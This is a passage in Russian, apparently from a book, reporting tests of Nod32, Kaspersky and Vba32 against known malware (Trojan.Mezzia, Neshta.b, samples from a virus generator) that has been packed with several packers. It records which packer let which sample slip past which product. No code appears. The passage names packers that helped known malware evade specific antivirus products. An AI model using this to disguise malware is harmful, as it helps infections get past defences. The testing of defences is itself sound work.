Ну Π²ΠΎΡ‚, собствСнно, ΠΈ настал ΠΌΠΎΠΌΠ΅Π½Ρ‚ истины. Π—Π°ΠΌΠ΅Ρ‚ΡŒΡ‚Π΅, Ρ‡Ρ‚ΠΎ Π½ΠΈ ΠΎΠ΄ΠΈΠ½ ΠΈΠ· Π½Π°ΡˆΠΈΡ… антивирусных ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² Π½Π΅ смог ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π·Π°ΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½Ρ‹ΠΉ SkD Undetectabler Pro 2 SkDPRO троянский конь – SkD Undetectabler Pro 2 SkDPRO!

Π•Π΄Π΅ΠΌ дальшС. Trojan.Mezzia ΠΏΠ°ΠΊΡƒΠ΅ΠΌ Zipworx SecureEXE. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹:

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.12).

Рис. 5.12.Vba Π½Π΅ спит

ВСст β„– 2

ВСст Π²ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ Π² сСбя ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΡƒ ΠΎΠ΄Π½ΠΎΠ³ΠΎ вируса нСсколькими ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠ°ΠΌΠΈ. Π’ качСствС Β«Π·Π»ΠΎ-ΠΊΠΎΠ΄Π°Β» Π±Ρ‹Π» использован извСстный Virus.Win32.Neshta.b. Π˜Ρ‚Π°ΠΊ, Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹.

ΠŸΡ€ΠΎΠΏΡƒΡΠΊΠ°Π΅ΠΌ нашСго "Π½Π΅Ρ‡Ρ‚ΠΎ" Ρ‡Π΅Ρ€Π΅Π· WinUpack:

♦ Nod32 2.7 "-";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.13).

Рис. 5.13. Neshta – Π½Π΅ ΡƒΠΉΠ΄Π΅Ρ‚! ΠŸΡ€ΠΎΠΏΡƒΡΠΊΠ°Π΅ΠΌ Neshta Ρ‡Π΅Ρ€Π΅Π· Arm Protector ver.01:

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "-" (рис. 5.14).

Рис. 5.14. Vba32 Π½Π΅ Π²ΠΈΠ΄ΠΈΡ‚ нашС Β«Π½Π΅Ρ‡Ρ‚ΠΎΒ»

ΠŸΡ€ΠΎΠΏΡƒΡΠΊΠ°Π΅ΠΌ "Π½Π΅Ρ‡Ρ‚ΠΎ" Ρ‡Π΅Ρ€Π΅Π· FSG. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹:

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.15).

Рис. 5.15. И ΠΎΠΏΡΡ‚ΡŒ наш антивирус Π½Π° высотС

ΠŸΠ Π˜ΠœΠ•Π§ΠΠΠ˜Π•

Как Π²ΠΈΠ΄ΠΈΡ‚Π΅, Π² этом тСстС Vba32 Π½Π΅ смог ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ "Π½Π΅Ρ‡Ρ‚ΠΎ", Π·Π°ΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ Arm Protector ver.01. Nod32 совсСм Π½Π΅ распознал Neshta, Π·Π°ΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ WinUpack. Π’Ρ‹Π²ΠΎΠ΄: ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½Π½ΠΎΠΉ эвристики Π½Π΅Ρ‚ – ΠΊ Π½Π΅ΠΉ лишь ΠΌΠΎΠΆΠ½ΠΎ ΡΡ‚Ρ€Π΅ΠΌΠΈΡ‚ΡŒΡΡ.

ВСст β„– 3

Π’ Π΄Π°Π½Π½ΠΎΠΌ тСстС Π±Ρ‹Π» использован Π³Π΅Π½Π΅Ρ€Π°Ρ‚ΠΎΡ€ вирусов APOKALIPSES. Из дСсяти сгСнСрированных экзСмпляров Vba32 ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ» 8, Nod32 2.7 – 9, «Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0Β» ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ» всС.